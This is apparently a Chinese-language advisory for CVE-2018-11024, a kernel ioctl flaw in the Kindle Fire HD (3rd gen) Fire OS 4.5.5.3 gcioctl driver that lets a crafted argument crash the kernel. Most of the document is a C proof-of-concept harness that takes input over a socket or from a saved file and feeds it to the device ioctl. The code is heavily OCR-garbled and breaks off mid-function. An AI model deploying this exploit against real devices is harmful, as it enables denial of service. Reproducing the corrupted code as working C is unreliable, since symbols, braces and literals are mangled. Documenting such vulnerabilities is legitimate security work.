（CVE-2018-11024）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

(CVE-2018-11024) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) FireOS 4.5.5.3 的内核组件中的内核模块 omapdriversmiscgcxgcioctlgcif.c 允许攻击者通过设备/ dev 上 ioctl 的参数 注入特制参数/gcioctl使用命令1077435789并导致内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc#include<stdio.h> #include<string.h> /strlen#include<sys/socket.h>#include<arpa/inet.h> /inet_addr#include<unistd.h> /write#include <stdlib.h> #include <sysstat.h>#include <sysmman.h>#include <fcntl.h>#include <stdbool.h> / Socket boilerplate code taken from here: http:/ server-client-example-c-sockets-Iinux/ *seed, ioctl-idj num-mappingsj num-blobs dev-name-lenj dev-name map_e ntry_t_arr, blobs*/int debug = 1;typedef struct int src_id;int dst_id;int offset; map_entry_t;short tiny_vals18 = 128, 127, 64, 63, 32, 31, 16, 15, 8, 7t % 3, 2,1, 0, 256, 255, -1；int *small_vals;int num_small_vals;/ populates small_vals when calledvoid populate_arrs(int top) int num = 1;int count = 0;while (num < top) /printf(',%dn' num);num <<= 1;count += 2; topcount += 1;/ -1count += 1;num_small_vals = count;num >>= 1;small_vals = malloc(sizeof(int)*count);memset(small_vals, 0, count);int i = 0;while(num > 1) small_valsi = num;i+;small-valsi = num-1;i+;num >>= 1;small_valsi = 0;small_valsi+l = top;small_valsi+2 = top-1;small_valsi+3 = -1;)/ generate a random value of size size and store it in elem./ value has a weight % chance to be a "small value"void gen_rand_val(int size, char *elemj int small_weight) int i;if (rand() % 100) < small_weight) / do small thingunsigned int idx = (rand() % num_small_vals); printf("Choosing %dn", small-valsidx);switch (size) case 2:idx = (rand() % 18);(short *)elem = tiny_valsidx; break;case 4:*(int *)elem = small_valsidx; break;case 8:*(long long*)elem = small_valsidx;break;default:printf("Damn bro. Size: %dn,j size);exit(-l);else for(i=0; i < size; i+) elemi = (char)(rand ()%0xl00);int main(int argc i char *argv)int num_blobs = 0, num_mappings = j i = 0, dev_name_len = 0, j;unsigned int ioctl_id = 0;char *dev_name;void *tmp;char *ptr_arr;int *len_arr;unsigned int seed;int sockfd , client_sock i c , read_size;struct sockaddr_in server , client;int msg_size;void *generic_arr264;/ max val for small_vals arrayint top = 8192;int ent = 0;/ chance that our generics are filled with "small vals,int default_weight = 50;populate_arrs(top);int retest = 1;goto rerun;sockfd = socket(AF_INET , SOCK_STREAM , 0);if (sockfd = -1) (printf(nCould not create socket");puts(,'Socket created");setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int) 1 , sizeof(in t)；server.sin_family = AF_INET;server.sin_addr.s_addr = INADDR_ANY;server.sin_port = htons(atoi(argvl);/Bindif( bind(sockfdj(struct sockaddr *)&server , sizeof(server) < 0) /print the error messageperror("bind failed. Error*1);return 1;puts(',bind done");listen:/ Listenlisten(sockfd , 3);puts("Waiting for incoming connections.);c = sizeof(struct sockaddr_in);/ accept connection from an incoming clientclient_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t *)&c)；if (client_sock < 0)perror("accept failed");return 1;)puts("Connection accepted");msg_size = 0;/ Receive a message from clientwhile( (read_size = recv(client_sock , &msg_size i 4 , 0) > 0 ) ( recv the entire messagechar *recv_buf = calloc(msg_size, sizeof(char);if (recv_buf = NULL) printf("Failed to allocate recv_bufn");exit(-l);int nrecvd = recv(client_sock, recv_bufj msg_size, 0);if (nrecvd != msg_size) printf("Error getting all data!n);printf(,nrecvd: %dnmsg_size:%dn", nrecvd, msg_size); e×it(-l);/ quickly save a copy of the most recent dataint savefd = open("sdcardsaved", O_WRONLYO_TRUNCO_CREAT, 06 44);if (savefd < 0) perror("open saved"); exit(-l);int err = Write(SaVefd, recv_bufj msg_size);if (err != msg_size) perror("write saved"); exit(-l);fsync(savefd);close(savefd);rerun:if (retest) recv_buf = calloc(msg_sizej sizeof(char);int fd = open(',sdcardsaved"j O_RDONLY);if (fd < 0) perror("open:");exit(-l);int fsize = lseek(fd, 0, SEEK_END);printf("file size: %dn", fsize);lseek(fdj 0, SEEK_SET); read(fdj recv_buffsize);)char *head = recv_buf;seed = 0;/seed, ioctl-idj num_mappings, num-blobsj dev_name_len, dev_na me, map_entry_t_arri blob-len-arrj blobsmemcpy(8tseedj head, 4);head += 4;memcpy(Sioctl-idj head, 4);head += 4;memcpy(&num_mappings, head, 4);head += 4;memcpy(Snum-blobsj head, 4);head += 4;memcpy(&dev_name_len, head, 4);head += 4;/ srand with new seed srand(seed);* dev name */dev_name = calloc(dev-name-len+lj sizeof(char);